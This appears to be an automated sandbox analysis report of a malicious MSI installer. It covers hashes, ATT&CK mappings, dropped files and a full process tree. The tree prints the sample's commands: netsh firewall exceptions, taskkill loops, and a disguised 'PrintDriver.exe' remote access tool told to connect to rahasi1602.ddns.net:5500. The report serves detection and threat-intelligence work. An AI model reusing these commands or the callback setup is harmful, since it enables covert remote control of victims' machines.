f14a6a3260dc52699b5fe4e777106408374663f9d1ec31cecd39a185c75b0b7b

Analysis

max time kernel
94s
max time network
96s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
13/09/2024, 01:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f14a6a3260dc52699b5fe4e777106408374663f9d1ec31cecd39a185c75b0b7b.msi
Size

3.5MB
MD5

d4703f9a1cf0030a94c03a89a32f4ed3
SHA1

c7a5bd3a819cc30f794c272fa85b1b2c51426438
SHA256

f14a6a3260dc52699b5fe4e777106408374663f9d1ec31cecd39a185c75b0b7b
SHA512

561d55e7b8d743c32c37e9a0bf61efb29552f1fe8ce48159791c7bb65dbdc4af1dcf9252ded9e76462928098d178b108bed92199c8c20641036beeb68872d345
SSDEEP

98304:/VHYDgp8WxFetMuI9Jq/amksP5NzIUYu/aMaobo9vnHG:RB8WxFqiTq/amksPvzIUYuiJrvnHG

Score

6^/10

discovery evasion persistence privilege_escalation

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	4424	msiexec.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1488	netsh.exe
2208	netsh.exe

Drops file in Windows directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\e5777df.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7B40.tmp	msiexec.exe
File created	C:\Windows\Installer\e5777df.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI79B6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI79D6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7BED.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI786C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7977.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7A83.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{DE9E5387-7C02-4CE2-B175-11AAEB8F4A82}	msiexec.exe

Executes dropped EXE 3 IoCs

pid	Process
316	MSI7BED.tmp
716	PrintDrivers.exe
3808	PrintDriver.exe

Loads dropped DLL 5 IoCs

pid	Process
2716	MsiExec.exe
2716	MsiExec.exe
2716	MsiExec.exe
2716	MsiExec.exe
2716	MsiExec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

persistence privilege_escalation

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
4424	msiexec.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSI7BED.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrintDrivers.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
3300	timeout.exe
2788	timeout.exe
3168	timeout.exe

Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Kills process with taskkill 3 IoCs

evasion

pid	Process
4368	taskkill.exe
3080	taskkill.exe
996	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1128	msiexec.exe
1128	msiexec.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe
716	PrintDrivers.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4424	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4424	msiexec.exe
Token: SeSecurityPrivilege	1128	msiexec.exe
Token: SeCreateTokenPrivilege	4424	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4424	msiexec.exe
Token: SeLockMemoryPrivilege	4424	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4424	msiexec.exe
Token: SeMachineAccountPrivilege	4424	msiexec.exe
Token: SeTcbPrivilege	4424	msiexec.exe
Token: SeSecurityPrivilege	4424	msiexec.exe
Token: SeTakeOwnershipPrivilege	4424	msiexec.exe
Token: SeLoadDriverPrivilege	4424	msiexec.exe
Token: SeSystemProfilePrivilege	4424	msiexec.exe
Token: SeSystemtimePrivilege	4424	msiexec.exe
Token: SeProfSingleProcessPrivilege	4424	msiexec.exe
Token: SeIncBasePriorityPrivilege	4424	msiexec.exe
Token: SeCreatePagefilePrivilege	4424	msiexec.exe
Token: SeCreatePermanentPrivilege	4424	msiexec.exe
Token: SeBackupPrivilege	4424	msiexec.exe
Token: SeRestorePrivilege	4424	msiexec.exe
Token: SeShutdownPrivilege	4424	msiexec.exe
Token: SeDebugPrivilege	4424	msiexec.exe
Token: SeAuditPrivilege	4424	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4424	msiexec.exe
Token: SeChangeNotifyPrivilege	4424	msiexec.exe
Token: SeRemoteShutdownPrivilege	4424	msiexec.exe
Token: SeUndockPrivilege	4424	msiexec.exe
Token: SeSyncAgentPrivilege	4424	msiexec.exe
Token: SeEnableDelegationPrivilege	4424	msiexec.exe
Token: SeManageVolumePrivilege	4424	msiexec.exe
Token: SeImpersonatePrivilege	4424	msiexec.exe
Token: SeCreateGlobalPrivilege	4424	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeRestorePrivilege	1128	msiexec.exe
Token: SeTakeOwnershipPrivilege	1128	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4948	WMIC.exe
Token: SeSecurityPrivilege	4948	WMIC.exe
Token: SeTakeOwnershipPrivilege	4948	WMIC.exe
Token: SeLoadDriverPrivilege	4948	WMIC.exe
Token: SeSystemProfilePrivilege	4948	WMIC.exe
Token: SeSystemtimePrivilege	4948	WMIC.exe
Token: SeProfSingleProcessPrivilege	4948	WMIC.exe
Token: SeIncBasePriorityPrivilege	4948	WMIC.exe
Token: SeCreatePagefilePrivilege	4948	WMIC.exe
Token: SeBackupPrivilege	4948	WMIC.exe
Token: SeRestorePrivilege	4948	WMIC.exe
Token: SeShutdownPrivilege	4948	WMIC.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4424	msiexec.exe
4424	msiexec.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 1128 wrote to memory of 2716	1128	msiexec.exe	87
PID 1128 wrote to memory of 2716	1128	msiexec.exe	87
PID 1128 wrote to memory of 2716	1128	msiexec.exe	87
PID 1128 wrote to memory of 316	1128	msiexec.exe	89
PID 1128 wrote to memory of 316	1128	msiexec.exe	89
PID 1128 wrote to memory of 316	1128	msiexec.exe	89
PID 4084 wrote to memory of 3208	4084	cmd.exe	93
PID 4084 wrote to memory of 3208	4084	cmd.exe	93
PID 4084 wrote to memory of 3340	4084	cmd.exe	94
PID 4084 wrote to memory of 3340	4084	cmd.exe	94
PID 4084 wrote to memory of 4408	4084	cmd.exe	95
PID 4084 wrote to memory of 4408	4084	cmd.exe	95
PID 4408 wrote to memory of 4140	4408	cmd.exe	96
PID 4408 wrote to memory of 4140	4408	cmd.exe	96
PID 4084 wrote to memory of 4948	4084	cmd.exe	98
PID 4084 wrote to memory of 4948	4084	cmd.exe	98
PID 4084 wrote to memory of 764	4084	cmd.exe	99
PID 4084 wrote to memory of 764	4084	cmd.exe	99
PID 4084 wrote to memory of 2292	4084	cmd.exe	104
PID 4084 wrote to memory of 2292	4084	cmd.exe	104
PID 4084 wrote to memory of 3400	4084	cmd.exe	105
PID 4084 wrote to memory of 3400	4084	cmd.exe	105
PID 3400 wrote to memory of 4848	3400	cmd.exe	106
PID 3400 wrote to memory of 4848	3400	cmd.exe	106
PID 3400 wrote to memory of 1488	3400	cmd.exe	107
PID 3400 wrote to memory of 1488	3400	cmd.exe	107
PID 3400 wrote to memory of 2208	3400	cmd.exe	109
PID 3400 wrote to memory of 2208	3400	cmd.exe	109
PID 3400 wrote to memory of 2340	3400	cmd.exe	110
PID 3400 wrote to memory of 2340	3400	cmd.exe	110
PID 3400 wrote to memory of 4416	3400	cmd.exe	111
PID 3400 wrote to memory of 4416	3400	cmd.exe	111
PID 3400 wrote to memory of 3808	3400	cmd.exe	112
PID 3400 wrote to memory of 3808	3400	cmd.exe	112
PID 4084 wrote to memory of 3300	4084	cmd.exe	113
PID 4084 wrote to memory of 3300	4084	cmd.exe	113
PID 4084 wrote to memory of 996	4084	cmd.exe	114
PID 4084 wrote to memory of 996	4084	cmd.exe	114
PID 4084 wrote to memory of 2788	4084	cmd.exe	115
PID 4084 wrote to memory of 2788	4084	cmd.exe	115
PID 4084 wrote to memory of 4368	4084	cmd.exe	116
PID 4084 wrote to memory of 4368	4084	cmd.exe	116
PID 4084 wrote to memory of 3168	4084	cmd.exe	117
PID 4084 wrote to memory of 3168	4084	cmd.exe	117
PID 4084 wrote to memory of 3080	4084	cmd.exe	120
PID 4084 wrote to memory of 3080	4084	cmd.exe	120

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\f14a6a3260dc52699b5fe4e777106408374663f9d1ec31cecd39a185c75b0b7b.msi
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4424

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1128
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 7DA6FE6562E4E0F6B3DC51650647B73C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2716
- C:\Windows\Installer\MSI7BED.tmp
  "C:\Windows\Installer\MSI7BED.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:316

C:\Games\PrintDrivers.exe
"C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "
1⤵
- Suspicious use of WriteProcessMemory
PID:4084
- C:\Windows\system32\mode.com
  Mode 90,20
  2⤵
  PID:3208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
  2⤵
  PID:3340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4408
- - C:\Windows\system32\reg.exe
    Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
    3⤵
    PID:4140
- C:\Windows\System32\Wbem\WMIC.exe
  wmic process where (name="PrintDriver.exe") get commandline
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4948
- C:\Windows\system32\findstr.exe
  findstr /i "PrintDriver.exe"
  2⤵
  PID:764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
  2⤵
  PID:2292
- C:\Windows\system32\cmd.exe
  cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3400
- - C:\Windows\system32\mode.com
    Mode 90,20
    3⤵
    PID:4848
- - C:\Windows\system32\netsh.exe
    netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1488
- - C:\Windows\system32\netsh.exe
    netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where (name="PrintDriver.exe") get commandline
    3⤵
    PID:2340
- - C:\Windows\system32\findstr.exe
    findstr /i "PrintDriver.exe"
    3⤵
    PID:4416
- - C:\Games\PrintDriver.exe
    C:\Games\PrintDriver.exe -autoreconnect ID:5578701 -connect rahasi1602.ddns.net:5500 -run
    3⤵
    - Executes dropped EXE
    PID:3808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3300
- C:\Windows\system32\taskkill.exe
  taskkill /im rundll32.exe /f
  2⤵
  - Kills process with taskkill
  PID:996
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2788
- C:\Windows\system32\taskkill.exe
  taskkill /im rundll32.exe /f
  2⤵
  - Kills process with taskkill
  PID:4368
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3168
- C:\Windows\system32\taskkill.exe
  taskkill /im rundll32.exe /f
  2⤵
  - Kills process with taskkill
  PID:3080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Installer Packages

T1546.016

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Installer Packages

T1546.016

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

System Binary Proxy Execution

T1218

Msiexec

T1218.007

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e5777e2.rbs

Filesize
418KB

MD5
dd1a729d73657c9e1843c989938a9942

SHA1
c3074f94b231cca15f341b17dee4129ea1b653dc

SHA256
8efcf157867388447b554a7152f364b7e67706bf96e4e901cf080c8b26ef342e

SHA512
495642ad5466dad21b43624c828a6d049c4363e79201ee887b9c7b422eaade917a1258c8eecab9a2823d0a313dec52c4fb55d9fab30ce5ede5b79c6cb2a248fe

Download Submit
C:\Games\PrintDriver.exe

Filesize
2.8MB

MD5
27c1c264c6fce4a5f44419f1783db8e0

SHA1
e071486e4dfef3a13f958a252d7000d3ce7bfd89

SHA256
29379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db

SHA512
a80a512be6f152e8737cd5d0a0a2a193eaf88f3bfb7ed6b7695d227e195db278e2734ebfc9fe48a68cfb13e4e5bb7fb4825019cfa2210ba741ecf8b11f954a98

Download Submit
C:\Games\PrintDriver.txt

Filesize
1KB

MD5
066e1a6a66fc069b2f8725db94d60d50

SHA1
0abf7df56183905cc28bf9b2e94c68daa629d364

SHA256
14af5fe1a75d173b0f40cfa756d10b83fb2327651f1c92ce1c124328c59009a3

SHA512
cd0e1c1efab4017532bb6926212dbee177dc2e34209641535b890b4c0cf012c030321b6c5308acfbe08df98aca09ab393c078ba105f0a96d81b89e9efde798ed

Download Submit
C:\Games\PrintDrivers.cmd

Filesize
1KB

MD5
0e1710306dfc0fb36cd67b6d9c15d7d8

SHA1
adb8014b9437615f3ab244c09dbe7b84ac2a058b

SHA256
4ca6a45db884e9faa6c81db026beeb89add322f0605b2947443b2905fe3f9109

SHA512
2b5acb867f15609afcfad6c4383fa85e495f4c87645bb635290c1123934c0ac32d2fb830fcbd4132efa4ce1c11fa95f266862b11e0d2284199ed1ab280dcdb80

Download Submit
C:\Games\PrintDrivers.exe

Filesize
403KB

MD5
29ed7d64ce8003c0139cccb04d9af7f0

SHA1
8172071a639681934d3dc77189eb88a04c8bcfac

SHA256
e48aac5148b261371c714b9e00268809832e4f82d23748e44f5cfbbf20ca3d3f

SHA512
4bdd4bf57eaf0c9914e483e160182db7f2581b0e2adc133885bf0f364123d849d247d3f077a58d930e80502a7f27f1457f7e2502d466aec80a4fbeebd0b59415

Download Submit
C:\Games\UltraVNC.ini

Filesize
1KB

MD5
b9dfbea744cc6c65473a97f2b959e44c

SHA1
c022f1d97fa56d61ad935aafa4e9e59e611e746a

SHA256
6f95a4eff9b0c2eaf37104b323d2b09c037aa7c3d472a1887c0f7914aa6c835d

SHA512
b92c8ea3583eb87f365b96cd45562cac2c4343e281c5090fc00db3f03bb5538a2d8aea3c39449d8d79cad31ed3692f6045266811d50fdd69807d8b12a9649eb5

Download Submit
C:\Windows\Installer\MSI786C.tmp

Filesize
904KB

MD5
421643ee7bb89e6df092bc4b18a40ff8

SHA1
e801582a6dd358060a699c9c5cde31cd07ee49ab

SHA256
d6b89fd5a95071e7b144d8bedcb09b694e9cd14bfbfafb782b17cf8413eac6da

SHA512
d59c4ec7690e535da84f94bef2be7f94d6bfd0b2908fa9a67d0897abe8a2825fd52354c495ea1a7f133f727c2ee356869cc80bacf5557864d535a72d8c396023

Download Submit
C:\Windows\Installer\MSI7BED.tmp

Filesize
413KB

MD5
44c34f892f724f343c7aa25dbeda10eb

SHA1
981fa2d2b1b2d97ec2868c15b5cfdd8dfa8c6b2f

SHA256
fe07636107d8ca6c8b6443c69d8fa187098cb1c92cfa54a7379cbe46ac4e3a43

SHA512
87596386d792a6f2010203e34c3d15e100ad8d6e96efa9e5edef1a7bc41dcb07aae96ee13218a07e49e05262e0fd53a16d86192d0bc05ab14e67124ee37a9cf9

Download Submit